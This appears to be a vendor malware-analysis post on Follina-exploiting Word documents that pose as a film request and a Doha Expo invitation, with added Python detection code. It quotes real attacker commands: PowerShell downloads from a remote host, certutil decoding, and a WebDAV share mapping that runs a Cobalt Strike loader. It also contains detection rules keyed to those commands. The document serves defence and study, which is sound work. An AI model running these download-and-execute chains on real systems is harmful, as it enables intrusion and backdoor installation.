On June 7th, the ASEC analysis team uploaded a brief introduction to a zero-day vulnerability in Microsoft Office (Follina, CVE-2022-30190). As a patch for the vulnerability has not been distributed yet, users are advised to take caution.
AhnLab has distributed detection rules for attack attempts exploiting this vulnerability, covering both file and behavior detection, and the attempts can be detected by various AhnLab products (V3, MDS, and EDR). While monitoring such attempts, the team found a distribution case targeting Korean users in the ASD (AhnLab Smart Defense) infrastructure on June 7th. The log shown below is from V3 Lite 4.0; the attack distributed a file named ‘Antimicrobial Film Request 1-1.docx’.
As the post mentioned above explains, the file makes msdt.exe run a remote command. That command abuses the legitimate Windows programs PowerShell.exe and CertUtil.exe to download an encoded script and decode it. PowerShell.exe is then used again to inject shellcode into the running explorer.exe, which carries out the malicious behavior. A more detailed explanation follows.
Opening the Word file ‘Antimicrobial Film Request 1-1.docx’, which exploits the CVE-2022-30190 vulnerability, executes the remote command shown above.
// Part of the decoded command shown in the figure above
"c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c powershell iwr -outf %tmp%\api.txt http://micronannox[.]com//b.txt & certutil -decode %tmp%\api.txt %tmp%\apis.ps1";
Start-Sleep 3;
Start-Process $cmd -windowstyle hidden -ArgumentList "/c powershell Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser & powershell %tmp%\apis.ps1
The code run through the vulnerability executes as follows.
- PowerShell.exe saves hxxp://micronannox[.]com/b.txt as %tmp%\api.txt.
- api.txt is Base64-decoded into apis.ps1 using CertUtil.exe (certutil -decode).
- The decoded apis.ps1 is then executed in a hidden window, after the PowerShell execution policy for the current user has been set to RemoteSigned so that the script is allowed to run.
- apis.ps1 injects shellcode into the running explorer.exe. The injected shellcode downloads additional encrypted data from hxxp://micronannox[.]com/imei.omg to C:\Users\Public\no1.png and decrypts it with XOR.
- The decrypted file is an executable that downloads additional backdoor files.
AhnLab products detect and block Word files exploiting this vulnerability under the following aliases.
V3 Behavior Detection
AhnLab EDR Detection
The detection log of the rule applied to files related to this vulnerability also revealed, on June 2nd, a file targeting the 2023 Doha Expo (VIP Invitation to Doha Expo 2023.docx), which is discussed below.
The file attempts to download data from the external URL referenced in its internal document.xml.rels. To trick users, the download URL is made to look related to the expo.
Figures 7 and 8 show how the Word file is disguised as an invitation to the Doha Expo.
The analysis team discovered two Word files while monitoring the detection logs. Both files carry the same URL in the external-target relationship of document.xml.rels; only the placement of the tag differs slightly.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
(..omitted..)
<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="hxxps://files.attend-doha-expo[.]com/inv.html!" TargetMode="External" />
(..omitted..)
</Relationships>
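The relationship above is the part of a .docx that a file-level check can key on: an oleObject relationship whose TargetMode is External and whose Target points at a remote HTML resource, here with the trailing "!" seen in Follina-style documents. The following Python is an added example, not code from the original post or an AhnLab rule; it unpacks a document, walks every .rels part and reports such relationships. The two documents it scans are constructed in memory for the example (they are not the real samples), and the malicious relationship reuses the URL quoted above with the defanged "[.]" left in place.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_OBJECT = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"


@dataclass(frozen=True)
class Finding:
    part: str        # the .rels part inside the zip container
    rel_id: str
    target: str
    reasons: tuple   # why this relationship was flagged


def scan_rels(part, xml_bytes):
    """Flag relationships in one .rels part that match the Follina delivery pattern."""
    findings = []
    root = ET.fromstring(xml_bytes)
    for rel in root.iter(f"{{{REL_NS}}}Relationship"):
        rtype, target = rel.get("Type", ""), rel.get("Target", "")
        external = rel.get("TargetMode", "Internal") == "External"
        reasons = []
        # An OLE object that lives outside the package is the Follina trigger.
        if external and rtype == OLE_OBJECT:
            reasons.append("external oleObject relationship")
        # Hyperlinks legitimately point at the web; other external relationships rarely do.
        if external and rtype != HYPERLINK and target.lower().startswith(("http://", "https://", "mhtml:")):
            reasons.append("remote target in non-hyperlink relationship")
        if target.endswith("!"):
            reasons.append("target ends with '!'")
        if "ms-msdt:" in target.lower():
            reasons.append("ms-msdt: scheme")
        if reasons:
            findings.append(Finding(part, rel.get("Id", ""), target, tuple(reasons)))
    return findings


def scan_docx(data):
    """Scan every .rels part of an OOXML container given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.endswith(".rels"):
                findings.extend(scan_rels(name, zf.read(name)))
    return findings


def build_sample_docx(rels_xml):
    """Minimal docx-shaped zip, constructed for this example (not a real sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0" encoding="UTF-8"?>'
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", '<?xml version="1.0" encoding="UTF-8"?>'
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed .rels content modelled on the relationship quoted in the post.
MALICIOUS_RELS = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId6" Type="{OLE_OBJECT}" Target="https://files.attend-doha-expo[.]com/inv.html!" TargetMode="External"/>
</Relationships>'''

# Constructed benign document: an external hyperlink and an internal image only.
BENIGN_RELS = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{HYPERLINK}" Target="https://example.com/" TargetMode="External"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/>
</Relationships>'''


if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_RELS), ("benign", BENIGN_RELS)):
        for f in scan_docx(build_sample_docx(rels)) or [None]:
            print(label, f)
```

Run it on a real document by passing the file's bytes to scan_docx. The check deliberately ignores hyperlink relationships, which point at the web in ordinary documents, so that the external oleObject case stands out.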
Like the previously published PoC, the upper part of the HTML file is a long comment block (AAA…). The lower part, however, holds Base64-encoded PowerShell code; the figure below shows the decoded code.
The previous blog post noted that a variety of attacks are possible, since attackers can execute whatever code they intend. In the HTML associated with the Word file disguised as the ‘2023 Doha Expo Invitation,’ the code can download a Cobalt Strike payload: it first kills msdt.exe, then maps an attacker-controlled WebDAV share (5.206.224[.]233) as drive Z:, runs osdupdate.exe from that drive, and finally removes the drive mapping.
$cmd="C:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c net use z: \\5.206.224[.]233\webdav\ /user:user `$RFVbgtyuJ32D && z:\osdupdate.exe && net use z: /delete ";
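Both execution chains on this page, the Antimicrobial Film sample's download-and-decode chain (PowerShell iwr, then certutil -decode, then a hidden PowerShell run) and the Doha Expo sample's WebDAV mapping above, share a structure a detection engineer can key on: msdt.exe spawned by an Office process, shells descending from it, and the specific command lines. The following Python is an added example, not AhnLab's detection rule or code from the original post. It runs a small set of rules over process-creation events constructed for the example and modelled on the command lines quoted on this page; the pids, the parent/child layout (including sdiagnhost.exe as the intermediate host that msdt.exe launches) and the benign events are assumptions made for the example.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name only, e.g. "msdt.exe"
    cmdline: str


@dataclass(frozen=True)
class Alert:
    rule: str
    pid: int
    image: str
    cmdline: str


OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# sdiagnhost.exe is assumed here as the scripted-diagnostics host that msdt.exe starts.
MSDT_CHAIN = {"msdt.exe", "sdiagnhost.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOAD_RE = re.compile(r"\b(iwr|invoke-webrequest|wget|curl)\b.*-outf", re.I)
WEBDAV_RE = re.compile(r"net\s+use\s+\w:\s+\\\\\S*webdav", re.I)


def ancestors(ev, by_pid):
    """Walk the parent chain; stops on unknown pids and on cycles from pid reuse."""
    seen = set()
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        yield cur
        cur = by_pid.get(cur.ppid)


def rule_office_spawned_msdt(ev, by_pid):
    parent = by_pid.get(ev.ppid)
    return ev.image.lower() == "msdt.exe" and parent is not None and parent.image.lower() in OFFICE_IMAGES


def rule_msdt_descendant_shell(ev, by_pid):
    return ev.image.lower() in SHELLS and any(a.image.lower() in MSDT_CHAIN for a in ancestors(ev, by_pid))


def rule_certutil_decode_to_temp(ev, by_pid):
    c = ev.cmdline.lower()
    return ev.image.lower() == "certutil.exe" and "-decode" in c and ("%tmp%" in c or "\\temp\\" in c)


def rule_powershell_download_to_disk(ev, by_pid):
    return ev.image.lower() in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_RE.search(ev.cmdline) is not None


def rule_webdav_share_exec(ev, by_pid):
    return WEBDAV_RE.search(ev.cmdline) is not None and "/user:" in ev.cmdline.lower()


def rule_msdt_taskkill(ev, by_pid):
    c = ev.cmdline.lower()
    return "taskkill" in c and "msdt.exe" in c


RULES = [(fn.__name__[len("rule_"):], fn) for fn in (
    rule_office_spawned_msdt, rule_msdt_descendant_shell, rule_certutil_decode_to_temp,
    rule_powershell_download_to_disk, rule_webdav_share_exec, rule_msdt_taskkill)]


def detect(events):
    by_pid = {e.pid: e for e in events}
    return [Alert(name, ev.pid, ev.image, ev.cmdline)
            for ev in events for name, fn in RULES if fn(ev, by_pid)]


def rules_by_pid(alerts):
    out = {}
    for a in alerts:
        out.setdefault(a.pid, set()).add(a.rule)
    return out


# Constructed events (pids and tree layout are assumptions for this example).
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, "explorer.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(1010, 1000, "WINWORD.EXE", r'"WINWORD.EXE" /n "Antimicrobial Film Request 1-1.docx"'),
    ProcEvent(1100, 1010, "msdt.exe", "msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param ..."),
    ProcEvent(1200, 1100, "sdiagnhost.exe", "sdiagnhost.exe"),
    ProcEvent(1400, 1200, "cmd.exe", r"/c powershell iwr -outf %tmp%\api.txt http://micronannox[.]com//b.txt & certutil -decode %tmp%\api.txt %tmp%\apis.ps1"),
    ProcEvent(1500, 1400, "powershell.exe", r"powershell iwr -outf %tmp%\api.txt http://micronannox[.]com//b.txt"),
    ProcEvent(1510, 1400, "certutil.exe", r"certutil -decode %tmp%\api.txt %tmp%\apis.ps1"),
    ProcEvent(1600, 1200, "cmd.exe", r"/c powershell Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser & powershell %tmp%\apis.ps1"),
    ProcEvent(2010, 1000, "WINWORD.EXE", r'"WINWORD.EXE" /n "VIP Invitation to Doha Expo 2023.docx"'),
    ProcEvent(2100, 2010, "msdt.exe", "msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param ..."),
    ProcEvent(2200, 2100, "sdiagnhost.exe", "sdiagnhost.exe"),
    ProcEvent(2400, 2200, "cmd.exe", "/c taskkill /f /im msdt.exe"),
    ProcEvent(2410, 2200, "cmd.exe", r"/c net use z: \\5.206.224[.]233\webdav\ /user:user `$RFVbgtyuJ32D && z:\osdupdate.exe && net use z: /delete"),
    ProcEvent(3000, 1000, "powershell.exe", "powershell.exe -NoLogo -Command Get-Process"),   # benign
    ProcEvent(3010, 1000, "cmd.exe", r"/c net use h: \\fileserver\home /persistent:yes"),   # benign
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a.rule:30} pid={a.pid} {a.image} :: {a.cmdline}")
```

The ancestry walk is what separates this from a plain command-line grep: a PowerShell download is interesting on its own, but a shell whose ancestor is msdt.exe under an Office process is the Follina signal even when the command line is obfuscated. Feed real events by mapping your EDR or Sysmon process-creation fields onto ProcEvent.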
Until an official patch is released, a temporary mitigation is to disable the MSDT URL protocol (the ms-msdt: handler), which stops Office documents from launching msdt.exe through this vector.
AhnLab can detect the malicious file and its behaviors with the following aliases:
- [File Alias]
- [Behavior Alias]
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.